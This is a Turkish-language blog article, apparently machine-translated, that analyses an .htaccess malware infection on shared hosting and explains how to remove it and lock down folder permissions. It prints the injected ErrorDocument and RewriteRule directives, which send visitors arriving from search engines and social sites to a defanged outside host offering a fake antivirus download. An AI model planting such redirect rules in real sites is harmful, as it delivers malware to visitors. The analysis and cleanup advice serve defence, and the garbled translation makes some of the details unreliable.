Kötü Amaçlı Yazılım / Virüs - .htaccess "yeniden yaz" ve yeniden yönlendirme

Virüs yeni bir formu kim çok barındırılan siteleri etkiler bilmiyorum görüyoruz Güvenilmez sunucular burada kullanıcı hesapları / alt alan hesapları aralarında "görülebilir". Özellikle, barındırma hesaplarının tümü klasöre yerleştirilir "vhosts"Ve yazma hakkı Kullanıcı klasörü "vhosts" dan genel bir kullanıcıya verilir… çoğu durumda satıcı tarafından. Kullanmayan web sunucularının tipik bir yöntemidir. WHM / cPanel.

.Htaccess virüs eylemi - .htaccess hack

Virüs dosyaları etkiler .htaccess kurban sitesi. Çizgiler eklendi / Direktifler karşı ziyaretçi yönlendirme (yahoo, msn, google, facebook, yaindex, twitter, myspace, vs.'den yüksek trafikli siteler ve portallardan gelir) sunan bazı sitelere "antivirüs". Hakkında sahte antivirüs, Hangi Hakkımda için giriş yazdı .

Bu nasıl .htaccess etkilenir: (Aşağıdaki içeriğe URL'ler hatları erişemiyor)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

Yeniden yazma motoru

RewriteCond% {HTTP_REFERER}. * Yandex. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Odnoklassniki. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vkontakte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Rambler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Tüp. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wikipedia. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Baidu. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Qq.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Myspace. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Twitter. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Facebook. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Google. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Canlı. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Aol. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Bing. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Amazon. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ebay. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LinkedIn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Flickr. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJasmin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Soso. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * DoubleClick. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Pornhub. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Orkut. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJournal. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. *wordpress* $ [NC, VEYA]
RewriteCond% {HTTP_REFERER}. * Yahoo. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ask. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Altavista. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Netscape. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Hotbot. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Goto. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Infoseek. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mamma. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Alltheweb. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Arama. * $ [NC, OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,VEYA]
RewriteCond% {HTTP_REFERER}. * Posta. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Dogpile. * $ [NC]

RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = r [R, L]

RewriteCond% {REQUEST_FILENAME}! -F
RewriteCond% {REQUEST_FILENAME}! -D
RewriteCond% {REQUEST_FILENAME} !. * Jpg $ |. * Gif $ |. * Png $
RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = 4 [R, L]

Kullanan kişiler WordPress bu satırları dosyada bulacaklar .htaccess itibaren public_html. Ek olarak, virüs klasörde aynı .htaccess oluşturur wp-content.

*Peoriavascularsurgery.com yerine göründüğü durumlar da vardır. dns.thesoulfoodcafe.com veya diğer adresler.

Bu virüs ne yapıyor?

Yönlendirildikten sonra, ziyaretçi kollarını açarak şu mesajla karşılanır:

Uyarı!
Bilgisayarınız çeşitli virüs belirtileri ve kötü amaçlı yazılım programları içeriyor. sizin system anında anti virüs kontrolü gerektirir!
System Güvenlik, bilgisayarınızı virüslere ve kötü amaçlı programlara karşı hızlı ve ücretsiz bir şekilde tarar.

kötü amaçlı yazılım 1

Hangi düğmeye basarsak basalım sayfaya yönlendiriliriz "Bilgisayarım", Taklit etmek için yaratıldı XP tasarımı. Burası, "tarama işleminin" otomatik olarak başladığı ve sonunda "bulaştığımızı" keşfetmemizi sağlayan yerdir.

kötü amaçlı yazılım 2

Tamam veya İptal düğmesine bastıktan sonra başlayacaktır indirbir dosyanın setup.exe. Bu setup.exe sahte bir anti virüs sistemi etkileyen. Virüs bulaşmış bağlantıları daha da yaymak için bir dizi kötü amaçlı yazılım uygulaması yükleyecek ve ayrıca anti-virüs yazılımı (ayrıca sahte) kurbanın satın almaya davet edildiği.
Virüsün bu biçimini zaten kapmış olanlar onu kullanabilir. . Ayrıca tüm HDD'nin taranması da önerilir. önermek Kaspersky Internet Security veya Kaspersky Anti-Virus.

Bu virüs türü, işletim sistemli ziyaretçilerin işletim sistemlerini etkiler. Windows XP, Windows ME Windows 2000, Windows NT, Windows 98 si Windows 95. Bugüne kadar, işletim sistemlerine bulaşma vakası bilinmemektedir Windows Görme evet Windows 7.

Bu .htaccess virüsünü sunucudan nasıl kaldırabiliriz ve bulaşmayı nasıl önleyebiliriz.

1. Şüpheli kodların dosya analizi ve silinmesi. Yalnızca dosyanın etkilenmemesini sağlamak için .htaccess iyi tüm dosyaları analiz ediyoruz . Php si . Js.

2. .htaccess dosyasını yeniden yazın ve kurun chmod 644 veya 744 sadece yazma hakları ile kullanıcı sahibi.

3. Klasörde bir site için barındırma hesabı oluştururken / Ana Sayfa veya / webroot otomatik olarak en sık kullanıcı adına sahip bir klasör oluşturur (cpanel için kullanıcı, ftp, vb). Verilerin yazılmasını ve virüslerin bir kullanıcıdan diğerine aktarılmasını önlemek için, her kullanıcı klasörüne ayarlanması önerilir:

chmod 644 veya 744, 755 - belirtilen 644'tür.
chown -R kullanıcı_adı klasör_adı.
chgrp -R kullanıcı_adı klasör_adı

ls -tüm modların doğru ayarlanıp ayarlanmadığını kontrol etmek için. Gibi bir şey:

drwx - x - x 12 dinamics dinamics 4096 6 Mayıs 14:51 dinamics /
drwx - x - x 10 duran duran 4096 Mar 7 07:46 duran /
drwx - x - x 12 test tüpü test tüpü 4096 Ocak 29 11:23 test tüpü /
drwxr-xr-x 14 express express 4096 26 Şubat 2009 express /
drwxr-xr-x 9 ezo ezo 4096 Mayıs 19 01:09 ezo /
drwx - x - x 9 farma farma 4096 Aralık 19 22:29 farma /

Yukarıdaki kullanıcılardan biri FTP'ye sahip olacaksa Virüslü dosyalar, virüsü başka bir barındırılan kullanıcıya gönderemez. Bir web sunucusunda barındırılan hesapları korumak için asgari bir güvenlik önlemidir.

Bu tür virüslerden etkilenen alanların ortak unsurları.

Etkilenen tüm alanlar, ziyaretçileri "/ alan adını içeren sitelere yönlendirirmain.php? s = 4 & H".

Bu ".htaccess virüsü"Her tür CMS'yi etkiler (joomla, WordPressphpBBvb.) kullanır .htaccess

.htaccess Virüs Hack ve Yönlendirme.

nasıl » AntiVirüs ve Güvenlik » Kötü Amaçlı Yazılım / Virüs - .htaccess "yeniden yaz" ve yeniden yönlendirme

Kurucu ve editör Stealth Settings, 2006'dan günümüze. İşletim sistemleri konusunda deneyim Linux (Özellikle CentOS), Mac OS X, Windows XP> Windows 10 si WordPress (İYS).

Leave a Comment